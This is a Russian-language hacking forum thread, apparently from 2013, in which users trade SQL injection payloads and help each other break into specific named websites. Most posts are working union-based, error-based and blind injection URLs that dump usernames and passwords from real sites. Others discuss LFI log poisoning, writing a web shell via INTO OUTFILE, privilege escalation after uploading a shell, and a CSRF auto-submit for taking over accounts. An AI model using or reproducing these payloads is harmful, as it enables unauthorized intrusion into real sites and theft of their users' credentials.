Unknowhacker
01.08.2013, 20:49
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом


Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)


Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!

Грабитель
01.08.2013, 21:11
Unknowhacker said:
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом

Code:
and(extractvalue(1,concat(0x3a,database())))and'

, а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24)

Code:
and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and'

задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!


select(password)from(tables)where(id=1)

только грешно взломами....

Unknowhacker
01.08.2013, 23:25
Грабитель said:
select(password)from(tables)where(id=1)
только грешно взломами....


Переделал на


Code:
and(extractvalue(1,concat(0x3a,select(password)fro m(tables)where(id=1))))and'

... не хочет зараза дикая

vikler
02.08.2013, 02:04
LFI провожу на сервере, на котором Mac OS X

После двухдневного копания, отрыла логи error_log, не обновлялся с 2010 года, притом судя по последней записи "Defaced", этот лог тогда кто-то явно отравил

В связи с этим вопрос: можно ли на Mac OS x найти некое подобие proc/self/environ ? Где бы писался user-agent?

php://filter работает, но удалось посмотреть исходный код только main.php

Нашла логин, пароль, бд от MySQL sphinx, но дело дохлое: только local host connection

надо лить шелл...но как это сделать на этом *** Mac OS X

vikler
03.08.2013, 13:37
OxoTnik said:
Посмотри другие логи, пути тут http://wiki.apache.org/httpd/DistrosDefaultLayout


не, НЕТУ

мЕНЯ НАСТОРАЖИВАЕТ, что все конфиги updat'ы 2010 года. что это значит? Сайт живой, обновляется просто постоянно, постоянный доступ посетителей....

edit: хотя нет, /var/log/secure.log обновляется сегодняшним днем к примеру

Cennarios
03.08.2013, 14:10
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.

vikler
03.08.2013, 15:08
Cennarios said:
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.


хм, спасибо, попробую в суб-доменах поискать....

EDIT: в суб-доменах та же херь

nicols
05.08.2013, 15:16
Помогите раскрутить


Code:
http://www.hochuvotpusk.ru:80/info.php?id=41

seozone
05.08.2013, 16:47
Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?

Unknowhacker
05.08.2013, 18:39
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

Кто осилит?

VK_unreg
05.08.2013, 20:07
seozone said:
Ребят, нашёл это: http://rp-gameworld.ru/misc/ что можно сделать с этим?


да ты порутал этот серв ничего с этого не поимеешь бро

cipa21
06.08.2013, 12:41
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--

как это можно обойти?

YaBtr
06.08.2013, 13:52
cipa21 said:
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?



Попробуй следующие запросы:

id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17 from information_schema.tables limit n,1+--+

id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+


Попробуй перебор стандартных пользовательских таблиц:

id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,1 2,13,14,15,16,17 from [таблица пользователей]+--+

Также иногда помогает hex: 0x[user],0x[password]

BigBear
12.08.2013, 16:04
cipa21 said:
Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?


id=-7888+union+select+1,2,3,@@version,5,6,7,8,9,10,11, 12,13,14,15,16,17--

пропускает ?

sfinxs
13.08.2013, 14:04
Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo

YaBtr
13.08.2013, 14:18
sfinxs said:
Привет . Есть вопрос про шелл . Вообшем залил шелл пробую закинуть какой нибудь пхп файл . пишет : ERROR cant c hmod 0777 . То есть надо как то присвоить права администратора или как обойти ето? spasibo


Команда chmod

+x - позволяет только запускать скрипт.

+rx - позволяет запускать и просматривать содержимое.

Также посмотрите и почитайте числовую установку прав доступа.

sfinxs
13.08.2013, 14:41
спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )

YaBtr
13.08.2013, 14:58
sfinxs said:
спс. а где ето ? на счет прав доступа неполучаеться поменять . пишет : админ - все доступы . ГРОУП - read only . другие : вообше нет. надо BIND делать и с netcat подключаться или по другому можно? )


Попробуйте повысить права:

Версия операционной системы --> exploit

sfinxs
13.08.2013, 15:21
самописный у него движок . ненаходит сканнер . Индекс.хтмл файла нету вообше. только индех.пх . где мануал какой нить ?

qaz
13.08.2013, 15:32
sfinxs said:
самописный у него движок . ненаходит сканнер .


движок тут вобще не причём, под словами ,,Версия операционной системы --> exploit,, имеется в виду порутать серв


sfinxs said:
Индекс.хтмл файла нету вообше.


ну понятное дело, все на пхп написано


sfinxs said:
где мануал какой нить ?


мануал по чём?

sfinxs
13.08.2013, 15:38
о том как повысить права или експлоит ОС где скачать и как юзать . Но может просто способ есть как присвоить себе права ? kak

Hracid
14.08.2013, 15:45
Доброго времени суток, господа!

есть у меня ряд вопросов по защите/атаке. чисто гипотетических. т.к. в качестве хобби решил заняться защитой информации. всегда меня это привлекало.

дома на 2х ноута стоит windows 7. "лицензия", всегда свежие обновления от мелко-мягких, над этим всем неустанно бдит касперский со свежими базами.

сеть организована следующим образом, есть модем(он же роутер) в режиме моста. внешний IP динамический.

под виртуалкой на одном из ноутов развернут Kali Linux.

собственно эксперементы в локальной сети уже провел все что смог придумать, да и это не особо интересно. т.к. в домашней локалке только я и жена.

опробовал в локальной сети:

1. dns spoofing. рабтает на ура =) в содружестве с s.e.t. дает просто обалденные результаты.

2. social engeneer toolkit(классная вещь в прямых руках)(получил пароль жены минут за 15... не особое достижение при том что я и так все её пароли знаю. но все равно было приятно что метод работает)

3. различные снифера в пачке с подменой ARP таблиц. (работает на ура!)

4. попробовал metasploit/armitage(вещь конечно грамотная, при наличии открытых уязвимостей), но даже при их наличии выпиливается начисто антивирусом(криптовать пэйлоады пробовал, но видимо руки кривые). специально ставил java машину старой версии, с уязвимостю, но попытка эксплуатации была присечена самой виндой... в моем случае софтина оказалось абсолютно не эффективной.

ну это все лирика. в локалке мне по хорошему бояться нечего. в виду ограниченого круга пользователей локальной сети.

меня больше волнуют атаки из вне. допустим меня хотят взломать(получить доступ к почте/рабочей станции разницы нет). чего мне стоит опасаться? мне на ум приходят следующие атаки:

1. средствами СИ(или еще как) меня заманивают на страницу со зловредным скриптом использующем уязвимость в java или flash или браузере и т.д. я перехожу, скрипт и пэйлоад не пропалились антивирусом. у атакующего профит, он имеет полный контроль над системой и всем что в ней есть.

2. опять же средствами СИ меня заманивают на фэйковый сайт и я как полный лохопет сливаю свои пароли от ресурса. (маловероятно конечно, но и такое возможно, вдруг я буду пьян или упорот)

3. мне присылают вредоноса(батник, powerShell, exe'шник, pdf, flash, офисный документ, что еще можно прислать?) которого я конечно запущу в основной системе а не под виртуалкой с XP...

4. XSS на всеми нами любимом mail.ru(ради интереса поискал при помощи 3х разных сканеров из набора kali) нашел 0. но особо ин не старался. да и чревато это.

если вам есть что добавить по поводу атак из вне, дописывайте мне как раз это и интересно. какие еще варианты атак существуют для получения доступа к компу или кражи почты? почта mail.ru или gmail. другим думаю мало кто сейчас пользуется. корпоративная почта не всчет, пусть об этом голова у службы безопасности болит.

меня интересуют ситуации с атакой на конкретную цель. т.е. в данном случае меня. брутфорс не предлагать. это слишком очевидно.

Br@!ns
16.08.2013, 13:25
есть сайтик один, в его админке проходя по адресу admin/index.php , сразу в адресной строке показывается /admin/index.php?env=-login:m0--1--s- . Тут получилось добиться пары ошибок:

Если после /admin/index.php?env=- ставить любой символ, допустим123 , то будет ошибка:

Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392

Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:

Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905

Если вместо admin/index.php?env=-login поставить любые другие символы, то переадресует на /admin/index.php?env=-login:m0--1--s-

Вопрос знатокам, что тут можно попробовать? я так понимаю php inj может быть, с ней не знаком, какие действия попробовать предпринять?

XAMEHA
16.08.2013, 13:46
Br@!ns said:
Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392


RFI там, если более фильтраций нет.


Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:
Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905


Может быть идет через explode разделение, эксперементировать на самом сайте надо. Ссылку в студию!

ZARO
17.08.2013, 06:49
Здравствуйте, часто встречаются сайты в которых blind inj дает одинаковый ответ при true и false выражениях, но при некорректном sql запросе страница меняется. Использовать time based inj получается далеко не всегда. И что же делать? Я знаю про такой тип атаки - and if((substring(version(),1,1)=5),1,(select 1 union select 2)) При true выражении в первом операнде ошибки не будет. Соответственно при false mysql будет выдавать ошибку - страница поменяется. Все это конечно хорошо руками, но как данное дело настроить на sql map, что бы автоматизировать данный процесс? Мб кто нибудь уже пробовал. Заранее спасибо ребят.

Unknowhacker
17.08.2013, 20:04
Не могу подобрать кол-во столбцов


Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+

знатоки подскажите

XAMEHA
17.08.2013, 20:16
Unknowhacker said:
Не могу подобрать кол-во столбцов

Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+

знатоки подскажите


А почему вы считаете, что здесь есть инъекция? Ни один тест её не подтверждает, тем более мы знаем по именам функций что это mysql.

А вот на соседней странице она имеется:


Code:
http://crimea.ua/section.php?CatId=9&SecId=75+and+1=2%29+union+select+1,2,3,version%28% 29,5+--+

nikitos2020
18.08.2013, 14:01
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс

XAMEHA
18.08.2013, 14:58
nikitos2020 said:
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс


Если вы используете document.forms, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:


PHP:
...

document.getElementById('test').submit();

nikitos2020
18.08.2013, 18:55
XAMEHA said:
Если вы используете
document.forms
, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:

PHP:
...

document.getElementById('test').submit();









не бро не прокатило((( может сам попробуешь? https://euroits.com/profile там зарегаться придётся, уязвимость в редактировании профиля, если подставить своё произвольно значение name или id форма несрабатывает, тебя просто перебрасывает на страницу изменения данных, но сами данные не изменины(

P.S при регистрации в поле кошелёк можно ввести "U1234567". попробуй заюзать XSRF если тебе не трудно. у меня на всех таких проектов получалось, но вот с этим беда(

nikitos2020
18.08.2013, 18:58
вот сама форма :


PHP:












Имя







PM кошел ек













Фамилия









Skype















E-mail





                                   



ICQ



































   



Старый пароль





Новый пар оль





   

Повтори те новый пароль
















XAMEHA
18.08.2013, 19:25
Можно тестовый аккаунт, обязательно посмотрю?Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:


PHP:






















document.getElementById('test').submit();





Предполагаю, что возможно сменить пароль не задавая старый нереально.

nikitos2020
18.08.2013, 20:36
XAMEHA said:
Можно тестовый аккаунт, обязательно посмотрю?
Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:

PHP:






















document.getElementById('test').submit();





Предполагаю, что возможно сменить пароль не задавая старый нереально.


)) так в этом и фишка бро) нужно всеголишь изменить mail, и начинаются танцы))) как только у жертвы поменяется почта, ты заходишь на сайт жмём "востоновить" после вводим мэил который поменялся у жертвы... к нам на почту приходит его ник и пароль (который стоит в настоящие время)) то есть пароль не сбрасывается а отправляется существующий в настоящий момент)) ах да вот аккаунт зарегал попробуй: логин: XAMEHA пароль: qwe123

XAMEHA
19.08.2013, 07:23
nikitos2020 said:
нужно всеголишь изменить mail, и начинаются танцы))


Но ведь этот ресурс не позволяет менять мыло даже у себя, оно не сохраняется в профиле

Кошелек, контакт, данные - да, а вот mail - нет. Возможно вам стоит выполнять какие-то другие действия?

Unknowhacker
19.08.2013, 19:48
В общем есть сукля, но раскрутить её не получается


Code:
http://shimanomarket.com.ua/products.php?category=53&page=0&special=show&order=-dprice%29%27+union+select+1,2,3+--+

и вторая


Code:
http://www.aerosol.com.ua/products.php?id=3%27

но если дописать union+select выбьет = Not Acceptable

Always
20.08.2013, 00:54
http://linzapro.ru/feedback/

пост

fsearch=777[SQL]&subsearch=1

не буду врать - нашел через софт, но руками никак...!

er9j6@
20.08.2013, 01:04
Always said:
http://linzapro.ru/feedback/
пост
fsearch=777[SQL]&subsearch=1
не буду врать - нашел через софт, но руками никак...!


Что за софт?

Блиндом крутится

http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%2 8select%20distinct%20table_name%20from%20%60inform ation_schema%60.tables%20where%20table_schema%3D0x 6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENC HMARK%28267134%2CMD5%280x41%29%29%2C0%29

YaBtr
20.08.2013, 16:51
Или так: post-запрос

http://i052.radikal.ru/1308/83/c27b1d1750fe.jpg

Spot
20.08.2013, 16:54
Отсечь часть UPDATE запроса

Добрый день,

на одном сайте столкнулся с заполнением анкеты, и в одном поле, случайно задал вместе с числом знак %, после чего при сохранения профиля мне выдало следующее:


Code:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near ';, abgl= 2, a_t = 2 WHERE id = 87637 AND user_id = 114239' at line 1 ---->

UPDATE you_profil SET t_raum_v= '09/2009 - 09/2012', zeitraum_von = '2009-9-00',
t_raum_b= '2012-9-00', beruf = '2', a_ort= 'Harward', e_znote= 'Bachelor',
notiz= 'Some text', note = 1.9%;, abgl= 2, a_t= 2 WHERE id = 87637 AND user_id = 114239

Пробывал экранировать остаток запроса после поля note = 1,9%-- и note = 1,9/** , но не выходит. Подскажите как можно закомментировать остаток запроса, что бы он не исполнялся. Вместо него хочу добавить свой запрос.

Always
20.08.2013, 22:45
er9j6@ said:
Что за софт?
Блиндом крутится
http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%2 8select%20distinct%20table_name%20from%20%60inform ation_schema%60.tables%20where%20table_schema%3D0x 6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENC HMARK%28267134%2CMD5%280x41%29%29%2C0%29




YaBtr said:
Или так:
post
-запрос
http://i052.radikal.ru/1308/83/c27b1d1750fe.jpg



никак...!

ishenko
21.08.2013, 00:35
Приветствую всех.

При запросе site.ru:3306 скачивается файл а в нем версия мускуля

F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F  яBad handshake

настройки мускула неправильные?

дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...

проверка по айпи может?

или еще как нить блокирует ?

Inoms
21.08.2013, 00:45
ishenko said:
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?


Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.

Unknowhacker
21.08.2013, 12:45
Я уже задолбался подбирать столбцы


Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

Ravenous
21.08.2013, 22:29
Unknowhacker said:
Я уже задолбался подбирать столбцы

Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так


SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"

http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

Unknowhacker
22.08.2013, 12:44
Ravenous said:
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1


Разочарование при вводе version() - I don't like you...

trololoman96
22.08.2013, 13:12
хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version

danil7493
23.08.2013, 11:55
Скажите что не так?

http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

migjee
23.08.2013, 14:28
Нашел единственную уязвимость на сайте.Начал анализ

Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?

RedX
23.08.2013, 14:52
danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy




HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_us ers+LIMIT+1,1--&page=1

YaBtr
23.08.2013, 15:06
danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy


Зачем скрывать доменное имя, если в большинстве случаев оно схоже с именем юзера или базы?! В Вашем случае, я так понимаю, http://www.trunov.com

Далее несложно определить, что курутиться несколько баз данных:

помимо information_schema и trunovc7_loy есть еще trunovc7_forum, которая и содержит необходимую Вам таблицу, то есть запрос примет вид ...from trunovc7_forum.phpbb_users.

И еще момент: колонки с названием passwordнет в таблице phpbb_users, есть user_password.

Итог:


http://www._____.com/news.php?newsid=-397+union+select+1,2,group_concat(0x3a,username,us er_password),4,5,6,7,8,9+from+trunovc7_forum.phpbb _users --+

migjee
23.08.2013, 15:06
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал

вот тут уязвимость

http://rp-gameworld.ru/index.php?c=registration&action=reg

BigBear
23.08.2013, 15:57
migjee said:
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg


Раскрытие путей же. Где тут инъекцию увидел?

Unknowhacker
23.08.2013, 19:43
Code:
http://www.redcross.org.ua/modules/news/index.php?id=-999

Ошибка вызывается только при дефисе перед переменной, при подбирании столбцов всё рушиться, обойти пробелы /**/ не получается..

Текст ошибки: SELECT * FROM aadm_menu WHERE id=: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

SECOND QUESTION ============================


Code:
http://www.amnu.gov.ua/index.php?p=calendar&action=events&show=public&sys_monat=08&sys_jahr=2013&sys_tag=24+union+select+1+--+&area=1#999

Выдаёт следующие:


Code:
Notice: Use of undefined constant HTTP - assumed 'HTTP' in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 70 Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 71
Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Redir.php on line 22

что-нибудь может с этого получится

3 ==== вот это ещё интересно


Code:
http://ua.oriflame.com/utils/messages/message.jhtml?textKey=conference_not_available'&_requestid=406406

Error: Could not find resourcestring: key: conference_not_available' bundleName: com.oriflame.bundles.oriLiteralBundle

Тут вообще выходит всплывающее окно и не даёт дальше крутить


Code:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27

YaBtr
26.08.2013, 11:32
Unknowhacker said:

Code:
Тут вообще выходит всплывающее окно и не даёт дальше крутить
[CODE]http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27



Здесь фильтр, но select+union пропускает:

1 случай: +union+select+1,2,3,4,5,6,7,8,9,10+--+

2 случай: +union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

В обоих случаях поле 2 - принтабельное.

exstreme
26.08.2013, 13:04
Можно ли здесь что-то сделать и в каком направлении рыть?


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'

YaBtr
26.08.2013, 13:55
exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'



Правильно определили уязвимый параметр usr_id.

Далее подбираем количество столбцов:

+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19+--+

Версия "5.1.49-Max-log"

Вот в этом направлении.

Unknowhacker
26.08.2013, 14:20
exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'



Вот держи раскрученная.. я так понял.. новичок..


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,6,7,%28select%28@x%29from %28select%28@x:=0x00%29,%28select%28null%29from%28 rh_tppg.usr%29where%280x00%29in%28@x:=concat%28@x, 0x3c62723e,lognme,0x3a,pwd%29%29%29%29x%29,9,10,11 ,12,13,14,15,16,17,18,19+--+

P.S См. ниже графа "Очки" И уберите пробелы в URL

exstreme
26.08.2013, 18:20
Unknowhacker said:
Вот держи раскрученная.. я так понял.. новичок..


Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия

YaBtr
26.08.2013, 18:28
[QUOTE="exstreme"]
exstreme said:
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия

p.s. согласно руководству по mysql переди послезнака комменария "--" cтавится пробел, т.е. +--+

exstreme
26.08.2013, 19:45
есть такое, спасибо, думал (%28) что пробел.


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test %22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO +OUTFILE+'tested.php'+--+

А это почему не срабатывает?

посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?

BigBear
26.08.2013, 20:07
exstreme said:
есть такое, спасибо, думал (%28) что пробел.

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test %22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO +OUTFILE+'tested.php'+--+

А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?


Принтабельные колонки подразумевают ЧТЕНИЕ, а НЕ ВЫПОЛНЕНИЕ запрашиваемых данных.

Хотя я встречал исключения. Очень-очень-очень редко.

Максимум что тут можешь выкопать - это опять же SiXSS посредством пассивной XSS в клиентском браузере. Но это опять же, выполняется на клиенте, а не на сервере.

exstreme
27.08.2013, 18:01
BigBear said:
Принтабельные колонки подразумевают
ЧТЕНИЕ
, а
НЕ ВЫПОЛНЕНИЕ
запрашиваемых данных.


То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;

к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду

Inoms
27.08.2013, 18:37
exstreme said:
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду


У юзера бд слишком кастрированные права, файла быть не может, его и нет.

Из доступных там бд всего 2 - текущая и information_schema, так что выводить там больше нечего.


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1 union select 1,2,3,4,@a,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from(select @a:=0,(select 1 from information_schema.tables where TABLE_SCHEMA='rh_tppg' and (@a:=concat(@a,";",TABLE_NAME))))b -- w

Например вывод таблиц из текущий базы.

Unknowhacker
29.08.2013, 20:07
Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16+--+

http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0

http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции

P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...

AlkatrasUSA
29.08.2013, 20:56
Ребят, помогите пожалуйста советом кто разбирается в скулях. БД MySQL 5.1.

Ситуация такая:

Уперся в глухой тупик при разборе Blind SQL injection, по типу true:false. Запрос исполнился - страница загрузилась как надо; запрос неверный - страница осталась пустой. Ручками в принципе нашел все таблицы что надо - оказались обычные джумловские, версии 1.5.15.

Сама скуля оказалась в компоненте virtuemart. Сам запрос на проверку уязвимости выглядит так:


Code:
http://site.ru/administrator/components/com_virtuemart/index.php?%20category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search%20_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=0 or 1=1 --

На "and" выдает ошибку (пустая страница), т.е. проходит только через "or". UNION, INSERT, UPDATE, кавычки и апострофы - в запросах также не проходят. Замена "and" или кавычек - hex кодом результата также не дает. Насчет инфы по БД, определить удалось только версию Version(), остальные функции: USER(), USER_session(), DATABASE() - определяет как ошибочные.

Все запросы на выборку делаются примерно так:


Code:
...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))>=49 limit 0,1)=1 --

и так тоже работает

...&search_category=0 or (SELECT 1 FROM jos_users WHERE substr(password,1,1)>=0х6d limit 0,1)=1 --

Т.е. можно сравнивать удачно как аскии код, так и hex код подбираемого символа. (Кэп)

В случае сравнения ASCII кодов интересно то, что сравнивать можно только по ">=" или "=". Знак меньше

Также есть доступ к php.ini. Если надо будет, могу подсмотреть какие-то параметры.


Code:
magic_quotes_gpc Off Off
safe_mode Off Off
sql.safe_mode Off Off
track_errors Off Off
display_errors Off Off
display_startup_errors Off Off
allow_url_fopen On On
allow_url_include Off Off

ЗЫ Подобные коллизиции пока в 2ух случаях нашел.

Unknowhacker
29.08.2013, 23:38
Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

